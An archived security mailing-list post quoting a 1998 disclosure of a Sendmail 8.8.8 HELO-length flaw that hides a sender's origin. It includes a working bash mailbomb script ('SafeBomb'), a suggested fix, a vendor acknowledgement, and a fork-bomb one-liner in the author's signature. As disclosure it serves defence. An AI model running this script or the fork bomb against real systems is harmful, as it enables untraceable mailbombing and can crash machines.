Seems like MS Exchange Internet Mail Service 5.5 is vulnerable too. -- "BSD code sucks. Of course, everything else sucks far more." - Theo de Raadt (OpenBSD President) > -----Original Message----- > From: Micha? Zalewski <lcamtufat_private> > To: infoat_private <infoat_private> > Date: 10 stycznia 1998 12:28 > Subject: Sendmail 8.8.8 (qmail?) HELO hole. > > > Here's a brief description of Sendmail (qmail) hole I found > recently: > > When someone mailbombs you, or tries to send fakemail, spam, etc - > sendmail normally attachs sender's host name and it's address > to outgoing message: > > -- > >From spamat_private Mon Jan 5 22:08:21 1998 > Received: from spammer (marcat_private [150.129.84.5]) > by myhost.com (8.8.8/8.8.8) with SMTP id WAA00376 > for lcamtuf; Mon, 5 Jan 1998 22:07:54 +0100 > Date: Mon, 5 Jan 1998 22:07:54 +0100 > From: spamat_private > Message-Id: <3.14159665@pi> > > MAILBOOM!!! > -- > > That's perfect - now you know, who is responsible for that annoying > junk in your mailbox: "Received: from spammer (marcat_private > [150.129.84.5])". Nothing easier... > But I found a small hole, which allows user to hide it's personality, > and send mails anonymously. The only thing you should do is to > pass HELO string longer than approx. 1024 B - sender's location and > other very useful information will be cropped!!! Message > headers should become not interesting. Sometimes, sender > may become quite untraceable (but not always, if it's possible > to obtain logs from machine which has been used to sent): > > -- > >From spamat_private Mon Jan 5 22:09:05 1998 > Received: from xxxxxxxxxxxxxx... [a lot of 'x's] ...xxxx > Date: Mon, 5 Jan 1998 22:08:52 +0100 > From: spamat_private > Message-Id: <3.14159665@pi> > > MAILBOOM!!! Now guess who am I... > -- > > > Here's a simple example of Sendmail's HELO hole usage. Note, this > script has been written ONLY to show how easy may be sending > fakemails, mailbombs, with cooperation of Sendmail ;) Script is > very slow and restricted in many ways, but explains the problem > well (note, some of non-Berkeley daemons are also affected, > probably Qmail?): > > -- EXPLOIT CODE -- > #!/bin/bash > TMPDIR=/tmp/`whoami` > PLIK=$TMPDIR/.safe > TIMEOUT=2 > LIMIT=10 > MAX=20 > > echo > echo "SafeBomb 1.02b -- sendmail HELO hole usage example" > echo "Author: Michal Zalewski <lcamtufat_private>" > echo > > if [ "$4" = "" ]; then > echo "USAGE: $0 msgfile address server sender" > echo > echo " msgfile - file to send as a message body" > echo " address - address of lucky recipient" > echo " server - outgoing smtp server w/sendmail" > echo " sender - introduce yourself" > echo > echo "WARNING: For educational use ONLY. Mailbombing is illegal." > echo "Think twice BEFORE you use this program in any way. Also," > echo "I've never said this program is 100% safe nor bug-free." > echo > sleep 1 > exit 0 > fi > > if [ ! -f $1 ]; then > echo "Message file not found." > echo > exit 0 > fi > > echo -n "Preparing message..." > mkdir $TMPDIR &>/dev/null > chmod 700 $TMPDIR > echo "echo \"helo > _safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safeb > omb__safebomb__safebomb__safebomb__safebomb__sa > febomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb > __safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__saf > ebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb_ > _safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safe > bomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__ > safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safeb > omb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__s > afebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebo > mb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__sa > febomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebom > b__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__saf > ebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb > b__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__saf > ebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb > __safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safe > bomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb_ > _safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safeb > omb_\"" >$PLIK > echo "echo \"mail from: \\\"$4\\\"\"" >>$PLIK > echo "echo \"rcpt to: $2\"" >>$PLIK > echo "echo \"data\"" >>$PLIK > echo "cat <<__qniec__" >>$PLIK > cat $1 >>$PLIK > echo "__qniec__" >>$PLIK > echo "echo \".\"" >>$PLIK > echo "echo \"quit\"" >>$PLIK > echo "sleep $TIMEOUT" >>$PLIK > chmod +x $PLIK > echo "OK" > > echo "Sending $1 (as $4) to $2 via $3 -- Ctrl+Z to abort." > SENT=0 > > while [ -f $1 ]; do > $PLIK|telnet $3 25 &>/dev/null & > let SENT=SENT+1 > echo -ne "Sent: $SENT\b\b\b\b\b\b\b\b\b\b\b\b\b" > CONNECTED=`ps|grep -c "telnet $3"` > if [ "$LIMIT" -le "$CONNECTED" ]; then > while [ "$LIMIT" -le "$CONNECTED" ]; do > sleep 1 > done > fi > if [ "$SENT" -ge "$MAX" ]; then > echo "It's just an example, sorry." > echo > exit 0 > fi > done > -- EOF -- > > Suggested fix: insert additional length limit into HELO/EHLO > parameter scanning routine OR disable AllowBogusHELO (but it > may cause serious troubles). I have no 8.8.8 sources at the > time, so execuse me if it's unclear. > > PS: > > -- > From: Gregory Neil Shapiro <sendmail+gshapiroat_private> > > I was able to reproduce the header problem by lengthening the HELO string > in your script. > > [...] > > This will be fixed in sendmail 8.9. > -- > > _______________________________________________________________________ > Micha? Zalewski [tel 9690] | finger 4 PGP [lcamtufat_private] > IterowaÖ jest rzecz+ ludzk+, wykonywaÖ rekursywnie - bosk+ [P. Deustch] > =--------- [ echo "while [ -f \$0 ]; do \$0 &;done" >_;. _ ] ---------= >
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:55:02 PDT